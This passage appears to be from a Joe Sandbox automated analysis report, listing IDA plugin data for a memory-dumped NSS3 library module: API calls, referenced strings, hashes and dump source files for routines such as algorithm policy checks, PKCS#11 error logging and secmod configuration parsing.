                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy$Error
                                                                                                                                                                                                                            • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                            • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                            • Opcode ID: 1c7bfd54c394ac23e081eb935dbc9356668abf1a07a5353594e878f0511e3fdd
                                                                                                                                                                                                                            • Instruction ID: 948756ee480661fa8f84b65003973eab5debac0eb1c95684e8771549a1388c9e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7bfd54c394ac23e081eb935dbc9356668abf1a07a5353594e878f0511e3fdd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8020162D0CBC86EFB328671C44D3E76AE4DB45328F0C166EC5DE56683CBB899498353
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C60
                                                                                                                                                                                                                            • PR_ExplodeTime.NSS3(00000000,6CB61C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C94
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                            • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                            • API String ID: 3534712800-180463219
                                                                                                                                                                                                                            • Opcode ID: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
                                                                                                                                                                                                                            • Instruction ID: 69b73ebab00574968427062cf9af40ba17964497f0deb49786e80c1d87512304
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54513B72B015494FC70CCDADDC526EEB7DAABA4310F48C23AE442DB785DA38E906C751
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CBCBD48
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CBCBD68
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CBCBD83
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CBCBD9E
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CBCBDB9
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CBCBDD0
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CBCBDEA
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CBCBE04
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CBCBE1E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AlgorithmPolicy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2721248240-0
                                                                                                                                                                                                                            • Opcode ID: 1834e01b0c00b3a446d7036db4f6826558b88e6888e327c97d46983a42ed381a
                                                                                                                                                                                                                            • Instruction ID: 6dcfd36ce45695598a057dfccc5babcdc0926ffc12c42908613523bd0b09eb11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1834e01b0c00b3a446d7036db4f6826558b88e6888e327c97d46983a42ed381a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC2182F7F042DA57FB004A5AAC43F8F7278DB91B4DF080528F916EE641F750941886A7
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CAF8637,?,?), ref: 6CC39E88
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CAF8637), ref: 6CC39ED6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CC39ECA
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC39EC0
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC39ECF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC7D086
                                                                                                                                                                                                                            • PR_Malloc.NSS3(00000001), ref: 6CC7D0B9
                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6CC7D138
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeMallocstrlen
                                                                                                                                                                                                                            • String ID: >
                                                                                                                                                                                                                            • API String ID: 1782319670-325317158
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CB91D46), ref: 6CB92345
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print
                                                                                                                                                                                                                            • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                                                                                                                                                                                            • API String ID: 3558298466-1980531169
                                                                                                                                                                                                                            • Opcode ID: b8eb188e2e52c79c380022ace2622502fc586b7fed502555066f2dcaee189f88
                                                                                                                                                                                                                            • Instruction ID: bc0e83354a9f21864c4c2921cad86b2718f619660be524611e301b20e07efc4a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8eb188e2e52c79c380022ace2622502fc586b7fed502555066f2dcaee189f88
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D561F320E8E4C7CFEA1C468C85BE36E3124E743354FA4C17BE5828FE51E695CA874693
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CBC5E08
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5E3F
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CBC5E5C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5E7E
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5E97
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CBC5EA5
                                                                                                                                                                                                                            • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CBC5EBB
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5ECB
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CBC5EF0
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5F12
                                                                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CBC5F35
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CBC5F5B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5F82
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CBC5FA3
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CBC5FB7
                                                                                                                                                                                                                            • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CBC5FC4
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5FDB
                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CBC5FE9
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC5FFE
                                                                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CBC600C
                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBC6027
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CBC605A
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,00000000), ref: 6CBC606A
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC607C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC609A
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC60B2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC60CE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                            • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                            • API String ID: 1427204090-154007103
                                                                                                                                                                                                                            • Opcode ID: 9c5df72e48430cde89041a30dfc43d52ce44fb84003c410aaf81c421db555ec8
                                                                                                                                                                                                                            • Instruction ID: 8df33004b49084bc1cb397c2a961cfb4adea87c86a724d17451a128da602af7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c5df72e48430cde89041a30dfc43d52ce44fb84003c410aaf81c421db555ec8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB91D5F0B042855BEF119F649C81BAA3BA8DF06288F080060EC55ABB42E775D959D7B7
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB51DA3
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CB51DB2
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB51DD8
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CB51E4F
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CB51EA4
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CB51ECD
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CB51EEF
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CB51F17
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB51F34
                                                                                                                                                                                                                            • PR_SetLogBuffering.NSS3(00004000), ref: 6CB51F61
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CB51F6E
                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB51F83
                                                                                                                                                                                                                            • PR_SetLogFile.NSS3(00000000), ref: 6CB51FA2
                                                                                                                                                                                                                            • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CB51FB8
                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6CB51FCB
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB51FD2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                            • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                            • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                            • Opcode ID: 2e332012c743b5f349b1a68f7d014f2ca81b10e32db0430d003890d21e47a485
                                                                                                                                                                                                                            • Instruction ID: 783fdbcc86ac05bb60f49dea5e052472af212f7e5c30d356a00c74a85e1c3442
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e332012c743b5f349b1a68f7d014f2ca81b10e32db0430d003890d21e47a485
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43519FB1E002899BDF00DFE5DC44A9E77B8EF01309F480528E916DBA40F775D568CBA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C50
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C5B
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C76
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4CAE
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CC9
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CF4
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4D0B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D5E
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D68
                                                                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBC4D85
                                                                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBC4DA2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC4DB9
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBC4DCF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                            • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                            • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                            • Opcode ID: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
                                                                                                                                                                                                                            • Instruction ID: 14e02d6961b7dbcf3e21ec5defa86c7d1e334e873e7689a67046c2ada566e89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 004149B2A001916BDB116F589C45ABF3675EB82358F188124EC1A5BB01E735DE64CBE3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB6DDDE
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CB6DDF5
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CB6DE34
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB6DE93
                                                                                                                                                                                                                            • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CB6DE9D
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB6DEB4
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB6DEC3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB6DED8
                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s%s,?,?), ref: 6CB6DEF0
                                                                                                                                                                                                                            • PR_smprintf.NSS3(6CC9AAF9,(NULL) (Validity Unknown)), ref: 6CB6DF04
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB6DF13
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB6DF22
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB6DF33
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB6DF3C
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB6DF4B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB6DF74
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB6DF8E
                                                                                                                                                                                                                            Strings
